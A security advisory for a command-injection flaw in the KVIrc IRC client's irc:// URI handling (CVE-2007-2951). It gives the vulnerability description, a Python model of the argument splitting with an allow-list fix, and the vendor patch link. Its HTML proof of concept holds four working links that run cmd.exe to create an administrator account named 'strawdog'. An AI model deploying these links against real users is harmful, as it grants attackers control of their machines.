KVIrc irc:// URI Handler Remote Command Injection Vulnerability
Published: 2007-06-26
Updated: 2007-06-28
Affected systems:
KVIrc KVIrc 3.2.5
KVIrc KVIrc 3.2
Description:
BUGTRAQ ID: 24652, 32410
CVE(CAN) ID: CVE-2007-2951
KVIrc is a free, portable IRC client.
The KVIrc client contains a vulnerability in its handling of "irc://" protocol strings; a remote attacker may exploit it to execute commands on the user's machine.
The parseIrcUrl() function in src/kvirc/kernel/kvi_ircurl.cpp does not properly filter parts of the URI when it builds commands for KVIrc's internal scripting system. If a user is tricked into opening a specially crafted irc:// or similar URI (for example irc6://), KVIrc scripting commands can be injected and executed. A successful attack requires that KVIrc be registered as the default handler for irc:// or similar URIs.
<*Source: Stefan Cornelius
Link:
http://secunia.com/secunia_research/2007-56/advisory/
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!
Each link below embeds a double quote followed by kvirc command-line options (--nosplash and -e); -e executes the given KVS command at startup, and the KVS run command launches an external program, here cmd.exe, which creates a local administrator account named strawdog. The four links cover the irc://, irc6://, ircs:// and ircs6:// schemes. Because the handler runs kvirc with the URI it receives, the attack only works where KVIrc is the registered handler for these schemes.
<html>
<body>
<!-- PoC: each href closes the quoted URI argument with a double quote, then passes extra kvirc options.
     -e executes a KVS command; "run cmd.exe /c ..." creates the local account strawdog and adds it to Administrators. -->
<a href='irc:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>Heaven and Earth are impartial</a><br>
<a href='irc6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see the ten thousand things as straw dogs</a><br>
<a href='ircs:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>The wise are impartial</a><br>
<a href='ircs6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see the people as straw dogs</a><br>
</body>
</html>
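The following Python model shows why the PoC above works and what a correct check looks like. It is an added illustration, not KVIrc code and not part of the original advisory: the handler template of the form "<exe>" "%1" is a hypothetical URL-protocol registration (the page does not show KVIrc's real registry entry), and win_argv() is a simplified stand-in for the Windows command-line splitting done by CommandLineToArgvW. The first PoC link is embedded as the sample input.

```python
"""Model of the argument-injection pattern used by the irc:// PoC above.

Illustration only, not KVIrc code: HANDLER_TEMPLATE is a hypothetical
protocol-handler registration and win_argv() approximates CommandLineToArgvW.
"""
import re
from urllib.parse import unquote

# Hypothetical handler registration of the form  "<exe>" "%1"  (assumption:
# the page does not show KVIrc's actual registry entry).
HANDLER_TEMPLATE = '"C:\\Program Files\\KVIrc\\kvirc.exe" "%1"'

# First link of the page's PoC, joined onto one line (constructed sample input).
POC_URI = ('irc:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20'
           'pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"')


def build_cmdline(uri: str, template: str = HANDLER_TEMPLATE) -> str:
    """Textual %1 substitution after percent-decoding, as a naive handler does.

    The URI is not escaped before substitution, which is what lets an embedded
    double quote terminate the quoted argument.
    """
    return template.replace("%1", unquote(uri))


def win_argv(cmdline: str) -> list[str]:
    """Simplified Windows command-line splitting.

    A double quote toggles quoted mode; unquoted whitespace ends an argument.
    Backslash-quote escapes are ignored, which is sufficient for this PoC.
    """
    argv, cur, quoted, have_arg = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
            have_arg = True
        elif ch in " \t" and not quoted:
            if have_arg:
                argv.append("".join(cur))
                cur, have_arg = [], False
        else:
            cur.append(ch)
            have_arg = True
    if have_arg:
        argv.append("".join(cur))
    return argv


def handler_args(uri: str) -> list[str]:
    """Arguments the handler executable would receive (argv without argv[0])."""
    return win_argv(build_cmdline(uri))[1:]


# Allow-list for the *decoded* URI: scheme, host[:port], optional channel path.
# Quotes, whitespace and anything else outside the list are rejected.
SAFE_IRC_URI = re.compile(
    r"^ircs?6?://[A-Za-z0-9.\-]*(:[0-9]{1,5})?(/[A-Za-z0-9._#&+\-,]*)?$"
)


def is_safe_irc_uri(uri: str) -> bool:
    """Validate after decoding so %22 / %20 cannot smuggle a quote or a space."""
    decoded = unquote(uri)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False
    return SAFE_IRC_URI.fullmatch(decoded) is not None


if __name__ == "__main__":
    for uri in ("irc://irc.example.net/kvirc", POC_URI):
        print(repr(uri[:32]), "->", handler_args(uri), "safe:", is_safe_irc_uri(uri))
```

For a benign URI the handler receives exactly one argument; for the PoC it receives five, including "--nosplash", "-e" and the run command, which is the injection. Validating the decoded URI against an allow-list before it reaches the handler (or before parseIrcUrl() builds a script command from it) rejects every PoC variant, since each contains a double quote and spaces.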
Recommendation:
Vendor patch:
KVIrc
-----
The vendor has released an update that fixes this security issue; download it from the vendor's site:
https://svn.kvirc.de/kvirc/changeset/630/#file3